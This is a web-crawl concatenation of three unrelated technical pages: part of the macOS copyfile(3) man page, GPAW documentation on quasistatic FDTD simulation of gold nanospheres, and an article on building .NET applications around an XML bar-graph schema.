extended attribute dur- ing a callback for COPYFILE_COPY_XATTR (see below for details). This field cannot be set, and may be NULL. Recursive Copies When given the COPYFILE_RECURSIVE flag, copyfile() (but not fcopyfile()) will use the fts(3) functions to recursively descend into the source file-system object. It then calls copyfile() on each of the entries it finds that way. If a call-back function is given (using copyfile_state_set() and COPYFILE_STATE_STATUS_CB ), the call-back func- tion.) The call-back function will have one of the following values as the first argument, indicating what is being copied: COPYFILE_RECURSE_FILE The object being copied is a file (or, rather, something other than a directory). COPYFILE_RECURSE_DIR The object being copied is a directory, and is being entered. (That is, none of the filesystem objects contained within the directory have been copied yet.) COPYFILE_RECURSE_DIR_CLEANUP The object being copied is a directory, and all of the objects contained have been copied. At this stage, the destination directory being copied will have any extra permissions that were added to allow the copying will be removed. COPYFILE_RECURSE_ERROR There was an error in processing an element of the source hierarchy; this happens when fts(3) returns an error or unknown file type. (Currently, the second argument to the call-back function will always be COPYFILE_ERR in this case.) The second argument to the call-back function will indicate the stage of the copy, and will be one of the following values: COPYFILE_START Before copying has begun. The third parameter will be a newly-created copyfile_state_t object with the call-back function and context pre-loaded. COPYFILE_FINISH After copying has successfully finished. COPYFILE_ERR Indicates an error has happened at some stage. If the first argument to the call-back function is COPYFILE_RECURSE_ERROR, then an error occurred while processing the source hierarchy; otherwise, it will indicate what type of object was being copied, and errno will be set to indicate the error. The fourth and fifth parameters are the source and destination paths that are to be copied (or have been copied, or failed to copy, depending on the second argument). The last argument to the call-back function will be the value set by COPYFILE_STATE_STATUS_CTX, if any. The call-back function is required to return one of the following values: COPYFILE_CONTINUE The copy will continue as expected. COPYFILE_SKIP This object will be skipped, and the next object will be processed. (Note that, when entering a directory. returning COPYFILE_SKIP from the call-back function will prevent the contents of the directory from being copied.) COPYFILE_QUIT The entire copy is aborted at this stage. Any filesystem objects created up to this point will remain. copyfile() will return -1, but errno will be unmodified. The call-back function must always return one of the values listed above; if not, the results are undefined. The call-back function will be called twice for each object (and an addi- tional two times for directory cleanup); the first call will have a stage parameter of COPYFILE_START; the second time, that value will be either COPYFILE_FINISH or COPYFILE_ERR to indicate a successful completion, or an error during processing. In the event of an error, the errno value will be set appropriately. The COPYFILE_PACK, COPYFILE_UNPACK, COPYFILE_MOVE, and COPYFILE_UNLINK flags are not used during a recursive copy, and will result in an error being returned. Progress Callback In addition to the recursive callbacks described above, copyfile() and fcopyfile() will also use a callback to report data (e.g., COPYFILE_DATA) progress. If given, the callback will be invoked on each write(2) call. The first argument to the callback function will be COPYFILE_COPY_DATA. The second argument will either be COPYFILE_PROGRESS (indicating that the write was successful), or COPYFILE_ERR (indicating that there was an error of some sort). The amount of data bytes copied so far can be retrieved using copyfile_state_get(), with the COPYFILE_STATE_COPIED requestor (the argu- ment type is a pointer to off_t ). When copying extended attributes, the first argument to the callback function will be COPYFILE_COPY_XATTR. The other arguments will be as described for COPYFILE_COPY_DATA; the name of the extended attribute being copied may be retrieved using copyfile_state_get() and the parame- ter COPYFILE_STATE_XATTRNAME. When using COPYFILE_PACK, the callback may be called with COPYFILE_START for each of the extended attributes first, followed by COPYFILE_PROGRESS before getting and packing the data for each individual attribute, and then COPYFILE_FINISH when finished with each individual attribute. (That is, COPYFILE_START may be called for all of the extended attributes, before the first callback with COPYFILE_PROGRESS is invoked.) Any attribute skipped by returning COPYFILE_SKIP from the COPYFILE_START callback will not be placed into the packed output file. The return value for the data callback must be one of COPYFILE_CONTINUE The copy will continue as expected. (In the case of error, it will attempt to write the data again.) COPYFILE_SKIP The data copy will be aborted, but without error. COPYFILE_QUIT The data copy will be aborted; in the case of COPYFILE_PROGRESS, errno will be set to ECANCELED. While the src and dst parameters will be passed in, they may be NULL in the case of fcopyfile(). RETURN VALUES Except when given the COPYFILE_CHECK flag, copyfile() and fcopyfile() return less than 0 on error, and 0 on success. All of the other func- tions return 0 on success, and less than 0 on error. WARNING Both copyfile() and fcopyfile() can copy symbolic links; there is a gap between when the source link is examined and the actual copy is started, and this can be a potential security risk, especially if the process has elevated privileges. When performing a recursive copy, if the source hierarchy changes while the copy is occurring, the results are undefined. fcopyfile() does not reset the seek position for either source or desti- nation. This can result in the destination file being a different size than the source file. ERRORS copyfile() and fcopyfile() will fail if: [EINVAL] An invalid flag was passed in with COPYFILE_RECURSIVE. [EINVAL] The from or to parameter to copyfile() was a NULL pointer. [EINVAL] The from or to parameter to copyfile() was a negative number. [ENOMEM] A memory allocation failed. [ENOTSUP] The source file was not a directory, symbolic link, or regular file. [ECANCELED] The copy was cancelled by callback. In addition, both functions may set errno via an underlying library or system call. EXAMPLES /*); SEE ALSO listxattr(2), getxattr(2), setxattr(2), acl(3) BUGS Both copyfile() functions lack a way to set the input or output block size. Recursive copies do not honor hard links. HISTORY The copyfile() API was introduced in Mac OS X 10.5. BSD April 27, 2006 BSD Mac OS X 10.8 - Generated Mon Aug 27 16:33:41 CDT 2012
http://www.manpagez.com/man/3/copyfile/
CC-MAIN-2020-05
en
refinedweb
Quasistatic Finite-Difference Time-Domain method¶ The optical properties of all materials depend on how they respond (absorb and scatter) to external electromagnetic fields. In classical electrodynamics, this response is described by the Maxwell equations. One widely used method for solving them numerically is the finite-difference time-domain (FDTD) approach. 1. It is based on propagating the electric and magnetic fields in time under the influence of an external perturbation (light) in such a way that the observables are expressed in real space grid points. The optical constants are obtained by analyzing the resulting far-field pattern. In the microscopic limit of classical electrodynamics the quasistatic approximation is valid and an alternative set of time-dependent equations for the polarization charge, polarization current, and the electric field can be derived.2 The quasistatic formulation of FDTD is implemented in GPAW. It can be used to model the optical properties of metallic nanostructures (i) purely classically, or (ii) in combination with Time-propagation TDDFT, which yields Hybrid Quantum/Classical Scheme. Quasistatic approximation¶ The quasistatic approximation of classical electrodynamics means that the retardation effects due to the finite speed of light are neglected. It is valid at very small length scales, typically below ~50 nm. Compared to full FDTD, quasistatic formulation has some advantageous features. The magnetic field is negligible and only the longitudinal electric field need to be considered, so the number of degrees of freedom is smaller. Because the retardation effects and propagating solutions are excluded, longer time steps and a simpler treatment of the boundary conditions can be used. Permittivity¶ In the current implementation, the permittivity of the classical material is parametrized as a linear combination of Lorentzian oscillators where \(\alpha_j, \beta_j, \bar{\omega}_j\) are fitted to reproduce the experimental permittivity. For gold and silver they can be found in Ref. 2. Permittivity defines how classical charge density polarizes when it is subject to external electric fields. The time-evolution for the charges in GPAW is performed with the leap-frog algorithm, following Ref. 3. To test the quality of the fit, one can use this script. This gives a following plot for Au permittivity fitting. Geometry components¶ Several routines are available to generate the basic shapes: \(\text{PolarizableBox}(\mathbf{r}_1, \mathbf{r}_2, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{r}_1\) and \(\mathbf{r}_2\) are the corner points, and \(\epsilon({\mathbf{r}, \omega})\) is the permittivity inside the structure \(\text{PolarizableSphere}(\mathbf{p}, r, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{p}\) is the center and \(r\) is the radius of the sphere \(\text{PolarizableEllipsoid}(\mathbf{p}, \mathbf{r}, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{p}\) is the center and \(\mathbf{r}\) is the array containing the three radii \(\text{PolarizableRod}(\mathbf{p}, r, \epsilon({\mathbf{r}, \omega}), c)\) where \(\mathbf{p}\) is an array of subsequent corner coordinates, \(r\) is the radius, and \(c\) is a boolean denoting whether the corners are rounded \(\text{PolarizableTetrahedron}(\mathbf{p}, \epsilon({\mathbf{r}, \omega}))\) where \(\mathbf{p}\) is an array containing the four corner points of the tetrahedron These routines can generate many typical geometries, and for general cases a set of tetrahedra can be used. Optical response¶ The QSFDTD method can be used to calculate the optical photoabsorption spectrum just like in Time-propagation TDDFT: The classical charge density is first perturbed with an instantaneous electric field, and then the time dependence of the induced dipole moment is recorderd. Its Fourier transformation gives the photoabsorption spectrum. Example: photoabsorption of gold nanosphere¶ This example calculates the photoabsorption spectrum of a nanosphere that has a diameter of 10 nm, and compares the result with analytical Mie scattering limit. from gpaw.fdtd.poisson_fdtd import QSFDTD from gpaw.fdtd.polarizable_material import (PermittivityPlus, PolarizableMaterial, PolarizableSphere) from gpaw.tddft import photoabsorption_spectrum))) # Quasistatic FDTD qsfdtd = QSFDTD(classical_material=classical_material, atoms=None, cells=large_cell, spacings=[8.0, 1.0], communicator=world, remove_moments=(4, 1)) # Run ground state energy = qsfdtd.ground_state('gs.gpw', nbands=-1) # Run time evolution qsfdtd.time_propagation('gs.gpw', time_step=10, iterations=1000, kick_strength=[0.001, 0.000, 0.000], dipole_moment_file='dm.dat') # Spectrum photoabsorption_spectrum('dm.dat', 'spec.dat', width=0.0) Here the QSFDTD object generates a dummy quantum system that is treated using GPAW in qsfdtd.ground_state. One can pass the GPAW arguments, like xc or nbands, to this function: in the example script one empty KS-orbital was included (nbands =1) because GPAW needs to propagate something. Similarly, the arguments for TDDFT (such as propagator) can be passed to time_propagation method. Note that the permittivity was initialized as PermittivityPlus, where Plus indicates that a renormalizing Lorentzian term is included; this extra term brings the static limit to vacuum value, i.e., \(\epsilon(\omega=0)=\epsilon_0\), see Ref. 4 for detailed explanation. The above script generates the photoabsorption spectrum and compares it with analytical formula of the Mie theory: where V is the nanosphere volume: The general shape of Mie spectrum, and especially the localized surface plasmon resonance (LSPR) at 2.5 eV, is clearly reproduced by QSFDTD. The shoulder at 1.9 eV and the stronger overall intensity are examples of the inaccuracies of the used discretization scheme: the shoulder originates from spurious surface scattering, and the intensity from the larger volume of the nanosphere defined in the grid. For a better estimate of the effective volume, you can take a look at the standard output where the “Fill ratio” tells that 18.035% of the grid points locate inside the sphere. This means that the volume (and intensity) is roughly 16% too large: \(\frac{V}{V_{\text{sphere}}}\approx\frac{0.18035\times(15\text{nm})^3)}{\frac{4}{3}\pi\times(5\text{nm})^3}\approx1.16\). Advanced example: Near field enhancement¶ This example shows how to calculate the induced electric near field enhancement of the same nanosphere considered in the previous example. The induced field calculations can be included by using the advanced syntax instead of the simple QSFDTD wrapper. In the example one can also see how the dummy empty quantum system is generated. from ase import Atoms from gpaw import GPAW from gpaw.fdtd.poisson_fdtd import FDTDPoissonSolver from gpaw.fdtd.polarizable_material import (PermittivityPlus, PolarizableMaterial, PolarizableSphere) from gpaw.tddft import TDDFT, photoabsorption_spectrum from gpaw.inducedfield.inducedfield_fdtd import FDTDInducedField))) # Poisson solver poissonsolver = FDTDPoissonSolver(classical_material=classical_material, cl_spacing=8.0, qm_spacing=1.0, cell=large_cell, communicator=world, remove_moments=(4, 1)) poissonsolver.set_calculation_mode('iterate') # Dummy quantum system atoms = Atoms('H', [0.5 * large_cell], cell=large_cell) atoms, qm_spacing, gpts = poissonsolver.cut_cell(atoms) del atoms[:] # Remove atoms, quantum system is empty # Initialize GPAW gs_calc = GPAW(gpts=gpts, nbands=-1, poissonsolver=poissonsolver) atoms.set_calculator(gs_calc) # Ground state energy = atoms.get_potential_energy() # Save state gs_calc.write('gs.gpw', 'all') # Initialize TDDFT and FDTD kick = [0.001, 0.000, 0.000] time_step = 10 iterations = 1000 td_calc = TDDFT('gs.gpw') td_calc.absorption_kick(kick_strength=kick) td_calc.hamiltonian.poisson.set_kick(kick) # Attach InducedField to the calculation frequencies = [2.45] width = 0.0 ind = FDTDInducedField(paw=td_calc, frequencies=frequencies, width=width) # Propagate TDDFT and FDTD td_calc.propagate(time_step, iterations, 'dm0.dat', 'td.gpw') # Save results td_calc.write('td.gpw', 'all') ind.write('td.ind') # Spectrum photoabsorption_spectrum('dm0.dat', 'spec.dat', width=width) # Induced field ind.calculate_induced_field(gridrefinement=2) ind.write('field.ind', mode='all') The contents of the obtained file field.ind can be visualized like described in Advanced example: Near field enhancement of hybrid system. We obtain a following plot of the field: Note that the oscillations in the induced field (and density) inside the material are caused by numerical limitations of the current implementation. Limitations¶ The scattering from the spurious surfaces of materials, which are present because of the representation of the polarizable material in uniformly spaced grid points, can cause unphysical broadening of the spectrum. Nonlinear response (hyperpolarizability) of the classical material is not supported, so do not use too large external fields. In addition to nonlinear media, also other special cases (nonlocal permittivity, natural birefringence, dichroism, etc.) are not enabled. The frequency-dependent permittivity of the classical material must be represented as a linear combination of Lorentzian oscillators. Other forms, such as Drude terms, should be implemented in the future. Also, the high-frequency limit must be vacuum permittivity. Future implementations should get rid of also this limitation. Only the grid-mode of GPAW (not e.g. LCAO) is supported. Technical remarks¶ Double grid technique: the calculation always uses two grids: one for the classical part and one for the TDDFT part. In purely classical simulations, suchs as the ones discussed in this page, the quantum subsystem contains one empty Kohn-Sham orbital. For more information, see the description of Hybrid Quantum/Classical Scheme because there the double grid is very important. Parallelizatility: QSFDTD calculations can by parallelized only over domains, so use either communicator=serial_comm or communicator=world when initializing QSFDTD (or FDTDPoissonSolver) class. The domain parallelization of QSFDTD does not affect the parallelization of DFT calculation. Multipole corrections to Poissonsolver: QSFDTD module is mainly intended for nanoplasmonic simulations. There the charge oscillations are strong and the usual zero boundary conditions for the electrostatic potential can give inaccurate results if the simulation box is not large enough. In some cases, such as for single nanospheres, one can improve the situation by defining remove_moments argument in FDTDPoissonSolver: this will then use the multipole moments correction scheme, see e.g. Ref. 5. TODO¶ Dielectrics (\(\epsilon_{\infty}\neq\epsilon_0\)) Geometries from 3D model files Subcell averaging Full FDTD (retardation effects) or interface to an external FDTD software Fix grid-dependent oscillations in the induced density Combination with TDDFT¶ The QSFDTD module is mainly aimed to be used in combination with Time-propagation TDDFT: see Hybrid Quantum/Classical Scheme for more information. References¶ - 1 A. Taflove and S. Hagness, Computational Electrodynamics: The Finite-Difference Time-Domain Method (3rd ed.), Artech House, Norwood, MA (2005). - 2(1,2) A. Coomar, C. Arntsen, K. A. Lopata, S. Pistinner and D. Neuhauser, Near-field: a finite-difference time-dependent method for simulation of electrodynamics on small scales, J. Chem. Phys. 135, 084121 (2011) - 3 Y. Gao and D. Neuhauser, Dynamical quantum-electrodynamics embedding: Combining time-dependent density functional theory and the near-field method J. Chem. Phys. 137, 074113 (2012) - 4 A. Sakko, T. P. Rossi and R. M. Nieminen, Dynamical coupling of plasmons and molecular excitations by hybrid quantum/classical calculations: time-domain approach J. Phys.: Condens. Matter 26, 315013 (2014) - 5 A. Castro, A. Rubio, and M. J. Stott Solution of Poisson’s equation for finite systems using plane wave methods Canad. J. Phys.: 81, 1151 (2003)
https://wiki.fysik.dtu.dk/gpaw/documentation/electrodynamics/qsfdtd.html
CC-MAIN-2020-05
en
refinedweb
The title article is causing a brouhaha about MS licensing practices. Given my reading of the license, I'm wondering if it really means what people are interpreting it to mean. Looking forward to the MS correction, which is likely to come sometime this week.;-) You might want to see what VNC is. It's a very useful tool to know about. Also, there's rdesktop for various UNIX flavors that allow connection to RDP servers, including the one in XP Pro. In fact, I'm using it to post this message. (Interesting Google tidbit... a while back I searched for "terminal services client linux" looking for what rdesktop is, but I had the hardest time finding it. iRights is no Yahoo.com, but Google does appreciate it, so I gave it a link, hoping to boost the rating so it would come up sooner. It seems I was successful, rdesktop.org is now the top hit for that search string. Look at the reverse links; only one higher. Another Google success.) I've definately decided to go with the Jabber stuff I described earlier. A few more advantages: Threading issues are simpler. If the users are responsible for re-establishing connections, there's a nasty time while the system is logging in, but the server will reject any other messages, like I said. If I take control of the re-establishment, it's easy to block these messages. There are also a few misc. places where I could construct a multi-threaded scenario where something bad happened; this reduces, and I think eliminates, those. (I need to double-check the elimination claim, but even if it's false, the consequences of being incorrect are not that critical.) Production quality. The .7 release is suitable for playing, but because disconnections are such violent events, it's not suitable for production use. .8 will be the beginning of production quality, at least in theory. ;-) As for anyone who may be playing with the framework and wonders if their code will be useless later, the answer is no. In fact, you'll find you'll need to make very few changes .7->.8; it will mostly be removing calls to "openConnection", and the connectionReference parameters. Feel free to play, and let me know what you find. The last issue I thought about is the callback approach versus a registerHandler function, as I currently use. Radio uses a callback system throughout, where you drop your script/address-to-script into some table, and everything works. I can't *quite* do that for Jabber, as scripts need to give a little more information about what they want to do. For instance, for an iq tag catcher, I need to know what namespace you're interested in, which I'll store in a table by that name. However, if you know in advance where your script will go, if you put it there manually, everything will work, so in the final analysis, the registerHandler function is just a convenience. I think I can get .8 out this week. Coding is fairly easy, but there's a lot of testing ground to cover; every capability of the system must be re-tested. I just filed my taxes. It took me and my wife half-an-hour, included no redundent steps, and was not at all stressful. (Except at one point where we had to go look up the meaning of "homestead".) The return was zapped off to Michigan and the IRS automatically, and the refunds will be direct deposited to our bank account. I didn't even go to the store to buy the tax software! I did it online with Turbo Tax for the Web, and I even did it all for free because I qualified for the Quicken Tax Freedom Project version. Compare this with ten years ago, and tell me technology is useless. It may not produce nirvana, but it just saved me several hours. (Interesting history of the federal income tax.) A.) 'Six months to the day after the Sept. 11 terrorist attacks, a Florida flight school where two of the suicide hijackers trained received letters from the Immigration and Naturalization Service indicating that the men had been approved for student visas.' And people wonder why I'm not willing to turn control of things like, say, what websites out children can and can't see, over to the government. Everybody's winging it...
http://www.jerf.org/iri/?page=120
CC-MAIN-2018-34
en
refinedweb
Language in C Interview Questions and Answers Ques 46. How do I print a floating-point number with higher precision say 23.34568734 with only precision up to two decimal places? Ans. This can be achieved through the use of suppression char '*' in the format string of printf( ) as shown in the following program. main( ) { int i = 2 ; float f = 23.34568734 ; printf ( "%.*f", i, f ) ; } The output of the above program would be 23.35. Is it helpful? Add Comment View Comments Ques 47. Are the expressions *ptr++ and ++*ptr same? Ans. No. *ptr++ increments the pointer and not the value pointed by it, whereas ++*ptr increments the value being pointed to by ptr. Is it helpful? Add Comment View Comments Ques 48. strpbrk( ) Ans. The function strpbrk( ) takes two strings as parameters. It scans the first string, to find, the first occurrence of any character appearing in the second string. The function returns a pointer to the first occurrence of the character it found in the first string. The following program demonstrates the use of string function strpbrk( ). #include <string.h> main( ) { char *str1 = "Hello!" ; char *str2 = "Better" ; char *p ; p = strpbrk ( str1, str2 ) ; if ( p ) printf ( "The first character found in str1 is %c", *p ) ; else printf ( "The character not found" ) ; } The output of the above program would be the first character found in str1 is e div( )... The function div( ) divides two integers and returns the quotient and remainder. This function takes two integer values as arguments; divides first integer with the second one and returns the answer of division of type div_t. The data type div_t is a structure that contains two long ints, namely quot and rem, which store quotient and remainder of division respectively. The following example shows the use of div( ) function. #include <stdlib.h> void main( ) { div_t res ; res = div ( 32, 5 ) ; printf ( "\nThe quotient = %d and remainder = %d ", res.quot, res.rem ) ; Is it helpful? Add Comment View Comments Ques 49. Can we convert an unsigned long integer value to a string? Ans. The function ultoa( ) can be used to convert an unsigned long integer value to a string. This function takes three arguments, first the value that is to be converted, second the base address of the buffer in which the converted number has to be stored (with a string terminating null character '\0') and the last argument specifies the base to be used in converting the value. Following example demonstrates the use of this function. #include <stdlib.h> void main( ) { unsigned long ul = 3234567231L ; char str[25] ; ultoa ( ul, str, 10 ) ; printf ( "str = %s unsigned long = %lu\n", str, ul ) ; } Is it helpful? Add Comment View Comments Ques 50. ceil( ) and floor( ) Ans. The math function ceil( ) takes a double value as an argument. This function finds the smallest possible integer to which the given number can be rounded up. Similarly, floor( ) being a math function, takes a double value as an argument and returns the largest possible integer to which the given double value can be rounded down. The following program demonstrates the use of both the functions. #include <math.h> void main( ) { double no = 1437.23167 ; double down, up ; down = floor ( no ) ; up = ceil ( no ) ; printf ( "The original number %7.5lf\n", no ) ; printf ( "The number rounded down %7.5lf\n", down ) ; printf ( "The number rounded up %7.5lf\n", up ) ; } The output of this program would be, The original number 1437.23167 The number rounded down 1437.00000 The number rounded up 1438.00000 Is it helpful? Add Comment View Comments Most helpful rated by users: - What will be the output of the following code? void main () { int i = 0 , a[3] ; a[i] = i++; printf ("%d",a[i]) ; } - Why doesn't the following code give the desired result? int x = 3000, y = 2000 ; long int z = x * y ; - Why doesn't the following statement work? char str[ ] = "Hello" ; strcat ( str, '!' ) ; - How do I know how many elements an array can hold? - How do I compare character data stored at two different memory locations?
http://www.withoutbook.com/Technology.php?tech=11&page=10&subject=
CC-MAIN-2018-34
en
refinedweb
AWS services or capabilities described in AWS Documentation may vary by region/location. Click Getting Started with Amazon AWS to see specific differences applicable to the China (Beijing) Region. This is the response object from the CreateRepository operation. Namespace: Amazon.ECR.Model Assembly: AWSSDK.ECR.dll Version: 3.x.y.z The CreateRepositoryResponse type exposes the following members This example creates a repository called nginx-web-app inside the project-a namespace in the default registry for an account. var response = client.CreateRepository(new CreateRepositoryRequest { RepositoryName = "project-a/nginx-web-app" }); Repository repository = response.Repository;
https://docs.aws.amazon.com/sdkfornet/v3/apidocs/items/ECR/TCreateRepositoryResponse.html
CC-MAIN-2018-34
en
refinedweb
Computes geodesic lines from start point to end point and stores them in a GIS file (Shapefile and GeoJSON). The problem of geodesic lines crossing antimeridian is solved. Project description Computes geodesic lines from start point to end point and stores them in a GIS file (Shapefile and GeoJSON). A geodesic is the shortest path between two points on a curved surface, like an ellipsoid of revolution (Read more on Wikipedia). This code is builded on top of three libraries: Pyproj, Fiona and Shapely. There are several libraries to compute geodesic distances solving the geodesic inverse problem (to find the shortest path between two given points). I chose Pyproj because it works fine for this purpose and is an interface to a widely used library in the geospatial industry (Proj4 C library). Actually Proj4 C library (>= v.4.9.0) routines used to compute geodesic distance are a simple transcription from excellent Geographiclib C++ Library developed by Charles Karney. Proj4 C library < v.4.9.0 uses Paul D. Thomas algorithms. You can see more about this here: GeodeticMusings: a little benchmark of three Python libraries to compute geodesic distances. All computations are performed with WGS84 ellipsoid and the CRS (Coordinate Reference System) of GIS file outputs are EPSG:4326. In the examples section you can see the problem of calculating lines crossing antimeridian is solved. Numpy array is supported as inputa data. Geodesic lines examples Below are shown different geodesic lines computed with this library on several map projections. Also you can see the relation with rhumb lines (loxodromic) and straight lines between the same points: Requirements - Pyproj, - Fiona, - Shapely, Usage Usage is very simple. There are two modes: - Single input (one start/end). - Multiple input (more than one start/end). Single input Single input usage. from geodesiclinestogis import GeodesicLine2Gisfile lons_lats: input coordinates. (start longitude, start latitude, end longitude, end latitude) lons_lats = (-3.6,40.5,-118.4,33.9) Folder path to store output file and filename: folderpath = '/tmp' layername = "geodesicline" Create object. You can pass two parameters: - antimeridian: [True, False] to solve antimeridian problem (default is True). - prints: [True, False] print output messages (default is True). gtg = GeodesicLine2Gisfile() Launch computations. You can pass two parameter: - lons_lats: input coords returned by gcComp. - km_pts: compute one point each n km (default is 20 km) cd = gtg.gdlComp(lons_lats, km_pts=30) Dump geodetic line coords to Linestring Feature and store in a GIS file. Output formats: “ESRI Shapefile” (default), “GeoJSON” # shapefile output gtg.gdlToGisFile(cd, folderpath, layername) # geojson output gtg.gdlToGisFile(cd, folderpath, layername, fmt="GeoJSON") Multiple input Multiple input usage.) ] folderpath = "/tmp/geod_line" layername = "geodesicline" gtg = GeodesicLine2Gisfile() gtg.gdlToGisFileMulti(data, folderpath, layername) Numpy array (multiple) input Numpy array input usage. import numpy as np) ] data = np.array(data_) folderpath = "/tmp/geod_line_np" layername = "geodesicline" gtg = GeodesicLine2Gisfile() gtg.gdlToGisFileMulti(data, folderpath, layername) License This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Third-Party licenses You can read Pyproj, Fiona and Shapely licenses in the next links: Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/GeodesicLinesToGIS/
CC-MAIN-2018-34
en
refinedweb
Document-Centric .NET May 12, 2004 The principle "program to an interface, not an implementation" helps control the complexity and enhance the flexibility of systems. XML interfaces are a natural extension of this principle that bring a number of new benefits in terms of flexibility, reusability, simplified code, and readiness for enterprise environments. We will walk through a sample application to see how the .NET framework classes can work together in an application centered around an XML interface. This XML interface will be the hub of present and future requirements. Our application will produce a bar graph from a variety of data sources. Though this example is relatively trivial, similar approaches can solve larger and more complex problems. The Schema Our bar graph application will revolve around a schema written in the W3C XML Schema language. Specifying this schema will be one of the first and most important design steps. Stability is key and all the better if you can use a standardized schema for your application. However, keep in mind that there are W3C XML Schema features that are not directly compatible with .NET's XML-to-database and XML-to-object mapping tools. For this application we'll use a custom schema: BarGraph.xsd. An instance document conforming to this schema looks like the following: <BarGraph xmlns=""> <Bar> <Title>Portland</Title> <Value>32</Value> </Bar> <Bar> <Title>Berlin</Title> <Value>20</Value> </Bar> <Bar> <Title>Pune</Title> <Value>16</Value> </Bar> </BarGraph> Taming the Winds: Input into our Application We'll start by gathering input from a variety of sources. The following three examples will each produce the same result: an XmlReader containing bar graph XML. XmlReader is an abstract class that plays a similar role to other platforms' use of SAX, in that it can be used to pass the contents of a XML text file, a DOM tree, or a high-throughput dynamic data source. GetXml() #1: REST web service The most familiar benefit of XML interfaces is that they allow applications to span machine and platform boundaries. Techniques that are well described asREST can be an easy way to pull XML from a network resource. We will use the XmlTextReader subclass of XmlReader, which can be used to read data from files or remote REST URLs. public XmlReader GetXml() { string url = ""; XmlReader graphReader = new XmlTextReader(url); return graphReader; } GetXml() #2: Database Another data source might be a database. Microsoft has placed XML at the center of its ADO.NET data access library with the DataSet, which is simultaneously a disconnected set of relational data and a XML document. The first step to get the XML is to create a DataAdapter, which is a bridge between the database and the DataSet. Here we construct a SqlDataAdapter, a SQL Server specific DataAdapter, with a connection string and a SQL statement. public XmlReader GetXml() { string sql = "SELECT * FROM [Category Sales for 1997]"; string conn = "Data Source=(local);Database=Northwind;" + "Integrated Security=SSPI;"; SqlDataAdapter da = new SqlDataAdapter(sql,conn); Next we create a new empty DataSet and fill it with data using the DataAdapter's Fill method. DataSet ds = new DataSet(); da.Fill(ds); The default schema of the dataset does not match bar graph XML. We could use XSLT to transform it, but in some cases we can do this more efficiently by directly modifying the DataSet. ds.DataSetName = "BarGraph"; ds.Namespace = ""; ds.Tables[0].TableName="Bar"; ds.Tables[0].Columns[0].ColumnName="Title"; ds.Tables[0].Columns[1].ColumnName="Value"; There are a number of ways to obtain the DataSet's XML, including the WriteXml and GetXml methods. Here we will use the XmlDataDocument class to expose the DataSet as a DOM object, and then create an XmlNodeReader, which is a XmlReader that reads the contents of a DOM object. XmlDocument xmlDoc = new XmlDataDocument(ds); XmlReader graphReader = new XmlNodeReader(xmlDoc); return graphReader; } GetXml() #3: User Form The previous example showed how a DataSet object can be used as a bridge between a database and XML. The DataSet can also be used as a bridge between controls in a Windows form and XML. The complete source code for this example is at form2graph.zip. In our form's constructor, we'll create a DataSet and give it a structure by reading in our BarGraph schema using the ReadXmlSchema method. private DataSet ds; private DataGrid grid; public BarGraphForm() { InitializeComponent(); // Create a dataset based on the schema ds = new DataSet(); ds.ReadXmlSchema("BarGraph.xsd"); Then we'll bind the DataSet to a DataGrid control in our form. The DataGrid will automatically create columns that conform to the schema in the DataSet. // Bind the dataset to a DataGrid control grid.SetDataBinding(ds,"Bar"); } Now when the form is displayed, the DataGrid will conform to the schema, and the user can add and edit data. Once the user is finished, we will use the WriteXml method to extract the XML from the dataset. public XmlReader GetXml() { Stream streamXml = new MemoryStream(); ds.WriteXml(streamXml); streamXml.Position = 0; XmlReader graphReader = new XmlTextReader(streamXml); return graphReader; } Application Output Each of the following examples will perform some action using an XmlReader containing bar graph XML. Naturally the choice of our input source is unimportant, since all the sources produce XmlReaders conforming to the same schema. OutputAction() #1: An SVG Image Another familiar benefit of XML interfaces is that an SVG or XHTML presentation is often only a transformation away. To perform the XSLT transform we load our XmlReader into a XPathDocument, public void OutputAction(XmlReader graphReader) { XPathDocument graphDoc = new XPathDocument(graphReader); set up the XslTransform object, XslTransform xslt = new XslTransform(); xslt.Load("svgGraph.xsl"); and write the output to a file. I am using the older .NET 1.0 syntax; In .NET 1.1's the Transform method has changed slightly. Stream outStream = new FileStream("graph.svg",FileMode.Create); xslt.Transform(graphDoc, null, outStream); outStream.Close(); } OutputAction() #2: A PNG Bitmap If some sort of human analysis is required, it's more appropriate to work with a graph than XML. This is how we'll convert our bar graph XML into a PNG image file. The complete source code for this example is in graph2png.zip. The OutputAction method will simply call the static XmlToPng method with the XmlReader. This will write the image onto an output stream. public void OutputAction(XmlReader graphReader) { Stream outStream = new FileStream("graph.png",FileMode.Create); BarGraphImage.XmlToPng(graphReader,outStream); outStream.Close(); } The static XmlToPng method creates the image by deserializing the XML into an object graph. We'll use the XmlSerializer class to create an instance of the custom BarGraphImage class and then call its WriteImage method to create the PNG image. public static void XmlToPng(XmlReader reader, Stream output) { // Create a XmlSerializer that will create an // object from the bar graph string ns = ""; XmlSerializer serializer = new XmlSerializer(typeof(BarGraphImage),ns); // Create a new instance of the BarGraph class from the XML BarGraphImage graphImage = (BarGraphImage)serializer.Deserialize(reader); // Write The Image graphImage.WriteImage(output,ImageFormat.Png); } To map the Bar Graph XML to our class, we use attributes (the stuff in the square brackets) to provide hints. For example, the BarGraphImage class will correspond to our top level <BarGraph> element. A useful feature of XmlSerializer is that it will automatically size and populate arrays, so we can leave out helper methods like AddBar(). This can save you a lot of code, especially when instantiating large and deep object graphs. [XmlRoot("BarGraph")] public class BarGraphImage { public BarGraphImage() {} private Bar[] _bars; [XmlElement("Bar")] public Bar[] Bars { get {return _bars;} set {_bars = value;} } public void WriteImage(Stream output, ImageFormat format) { .... } public static void XmlToPng(XmlReader reader, Stream output) { .... } } public class Bar { public Bar() {} public string Title; public double Value; } OutputAction() #3: A Network XML Consumer Perhaps our application is just part of a distributed pipeline or needs to pass the bar graph XML into some sort of content management store. Here we'll pass the bar graph XML on to a protected REST webservice. Create a web request, and supply the Windows credentials in which the application is running, public void OutputActions(XmlReader graphReader) { string url = ""; WebRequest uploader = WebRequest.Create(url); uploader.Method="POST"; Supply the appropriate credentials, uploader.Credentials = CredentialCache.DefaultCredentials; And use the WriteNode() method of XmlWriter to write the contents of the XmlReader to the request stream. Stream upStream = uploader.GetRequestStream(); XmlWriter upWriter = new XmlTextWriter(upStream,Encoding.UTF8); upWriter.WriteNode(graphReader,true); upWriter.Close(); 